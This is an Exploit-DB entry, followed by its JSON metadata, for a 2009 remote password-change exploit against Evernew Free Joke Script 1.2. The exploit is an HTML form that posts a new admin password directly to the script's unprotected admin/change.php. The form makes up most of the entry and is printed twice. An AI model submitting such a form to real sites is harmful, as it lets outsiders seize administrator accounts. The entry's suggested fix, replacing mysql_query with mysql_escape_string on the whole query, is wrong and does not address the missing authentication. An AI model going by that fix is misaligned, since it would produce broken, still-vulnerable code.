ID EDB-ID:8956
Type exploitdb
Reporter Hakxer
Modified 2009-06-15T00:00:00
Description
Evernew Free Joke Script 1.2 Remote Change Password Exploit. Webapps exploit for php platform
<!--
Discovered & Exploited by : Hakxer
Evernew Free Joke Script 1.2 => Remote Change Password
[=>] Bug detail
bug in change.php file
in line 10 :
$result=mysql_query("update admin set password='$pass'");
-----------------------
[=>] Fix
$result=mysql_escape_string("update admin set password='$pass'");
change mysql_query to mysql_escape_string
[=>] Greetz : ExH , ProViDoR , Error code , dody2100 , sinaritx , all my friends
!-->
<form action="http://www.site.com/script/admin/change.php" method="post" name="form1" id="form1" onSubmit="MM_validateForm('password','','R');return document.MM_returnValue">
<font class="text"><b>enter password to change it in admin :D</b></font> <br />
<br/>
<table width="305" height="106" border="0" cellpadding="5" cellspacing="0">
<tr>
<td width="103" class="text">Password : </td>
<td width="182"><div align="left">
<input name="password" type="password" class="style7" id="password" />
</div></td>
</tr>
<tr>
<td colspan="2"><div align="center">
<input name="Submit" type="submit" class="text_1" value="Change Password" />
</div></td>
</tr>
<tr>
<td colspan="2"><?php echo($msg); ?> </td>
</tr>
</table>
</form>
# milw0rm.com [2009-06-15]
{"bulletinFamily": "exploit", "id": "EDB-ID:8956", "cvelist": [], "modified": "2009-06-15T00:00:00", "lastseen": "2016-02-01T09:33:11", "edition": 1, "sourceData": "<!--\n Discovered & Exploited by : Hakxer\n Evernew Free Joke Script 1.2 => Remote Change Password\n \n [=>] Bug detail\n bug in change.php file\n in line 10 :\n $result=mysql_query(\"update admin set password='$pass'\");\n -----------------------\n \n [=>] Fix\n $result=mysql_escape_string(\"update admin set password='$pass'\");\n change mysql_query to mysql_escape_string\n \n [=>] Greetz : ExH , ProViDoR , Error code , dody2100 , sinaritx , all my friends\n!-->\n<form action=\"http://www.site.com/script/admin/change.php\" method=\"post\" name=\"form1\" id=\"form1\" onSubmit=\"MM_validateForm('password','','R');return document.MM_returnValue\">\n<font class=\"text\"><b>enter password to change it in admin :D</b></font> <br />\n<br/>\n<table width=\"305\" height=\"106\" border=\"0\" cellpadding=\"5\" cellspacing=\"0\">\n<tr>\n<td width=\"103\" class=\"text\">Password : </td>\n<td width=\"182\"><div align=\"left\">\n<input name=\"password\" type=\"password\" class=\"style7\" id=\"password\" />\n</div></td>\n</tr>\n<tr>\n<td colspan=\"2\"><div align=\"center\">\n<input name=\"Submit\" type=\"submit\" class=\"text_1\" value=\"Change Password\" />\n</div></td>\n</tr>\n<tr>\n<td colspan=\"2\"><?php echo($msg); ?> </td>\n</tr>\n</table>\n</form>\n\n# milw0rm.com [2009-06-15]\n", "published": "2009-06-15T00:00:00", "href": "https://www.exploit-db.com/exploits/8956/", "osvdbidlist": [], "reporter": "Hakxer", "hash": "7d1dcc2dedd023dd4e67f7051cd9e54caf55a47b2d4bfcf8ab6a71f17173e607", "title": "Evernew Free Joke Script 1.2 - Remote Change Password Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Evernew Free Joke Script 1.2 Remote Change Password Exploit. Webapps exploit for php platform", "references": [], "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/8956/", "enchantments": {"vulnersScore": 7.5}}
{"result": {}}